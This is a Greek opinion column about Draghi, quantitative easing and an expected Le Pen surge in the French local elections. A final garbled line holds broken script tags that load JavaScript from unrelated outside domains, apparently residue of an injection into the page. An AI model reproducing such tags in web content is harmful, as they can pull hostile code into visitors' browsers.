Το σοκ του Μαρτίου… Γιώργος Καπόπουλος

Ο Ντράγκι προχθές από τη Λευκωσία κατέγραψε τα μηνύματα ή καλύτερα το κλίμα μιας προσδοκώμενης επιστροφής στην ανάπτυξη με επιφύλαξη, καθώς επανέλαβε ότι η ποσοτική χαλάρωση δεν θα έχει προσδιορισμένη χρονικά ημερομηνία λήξης μέχρι να διασφαλισθεί η οριστική αποφυγή εγκλωβισμού της Ευρωζώνης σε σπιράλ αποπληθωρισμού.

Επιπλέον, εντός και εκτός Γηραιάς Ηπείρου όλοι γνωρίζουν και όλοι αποσιωπούν, σαν να ήθελαν να το… ξορκίσουν, το σοκ που έρχεται για την Ευρωζώνη εντός του Μαρτίου. Ενα σοκ που δεν αφορά σε καμιά περίπτωση την Αθήνα και τη δύσκολη διαπραγμάτευσή της με τους εταίρους της, δεν αφορά τα εξωπραγματικά σενάρια για Grexit ή πιστωτικό γεγονός και μάλιστα την ώρα της έναρξης της ποσοτικής χαλάρωσης που απαιτεί ήρεμα νερά, αλλά ένα πολιτικό γεγονός που θα συμβεί την Κυριακή 22.3 στις 8 το βράδυ ώρα Γαλλίας: από τις κάλπες του πρώτου γύρου των νομαρχιακών εκλογών θα αναδειχθεί πρώτο κόμμα το ακροδεξιό Εθνικό Μέτωπο της Λεπέν.

«Ξαστεριά για τη Γαλλική Οικονομία» ήταν ο πρωτοσέλιδος τίτλος της «Μοντ» χθες Παρασκευή, που πανηγυρίζει για την αύξηση των κερδών των εταιρειών του Χρηματιστηριακού Δείκτη CAC 40. Ουδείς είναι αφελής για να πιστέψει ότι ο CAC 40 θα ανακόψει την επέλαση της Λεπέν που μπορεί να επενδύει στη συνεχή πίεση που υφίστανται οι Ολάντ-Βαλς από το Βερολίνο, τις Βρυξέλλες και τη Φρανκφούρτη, την έδρα της ΕΚΤ, για περισσότερες περικοπές δημόσιων δαπανών, που σημαίνει σε απλά γαλλικά περισσότερη φτωχοποίηση για τη μεσαία τάξη και περαιτέρω συρρίκνωση του κράτους πρόνοιας.

Η Λεπέν καταγράφεται ως η επόμενη ένοικος του Μεγάρου των Ηλυσίων, όπως μαρτυρά η μισή τρίτη σελίδα συνέντευξής της χθες στους «Financial Times». Τίποτε δεν δείχνει ότι θα υπάρξει πολιτική στήριξη προς τον Ολάντ πέραν της προθεσμίας μέχρι το 2017 για να συμμορφωθεί με το δημοσιονομικό σύμφωνο. Στη φόρμουλα ανάσα στο παρά πέντε – πιέσεις για συμμόρφωση, πίεση για περαιτέρω προσαρμογή από το Παρίσι άσκησε από την Κύπρο ο Ντράγκι, ενώ η διάψευση της φήμης ότι το Euroworking Group της Τετάρτης συζήτησε τις δράσεις που θα καταθέσει η Αθήνα στο Eurogroup συνοδεύθηκε από τη διευκρίνιση ότι αντικείμενο της συζήτησης ήταν η δημοσιονομική ευταξία στη Γαλλία και την Ιταλία. Αν η Μαρίν ανησύχησε από τον CAC 40, οι «Θεσμοί» έσπευσαν να την καθησυχάσουν.

ethnos.gr___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >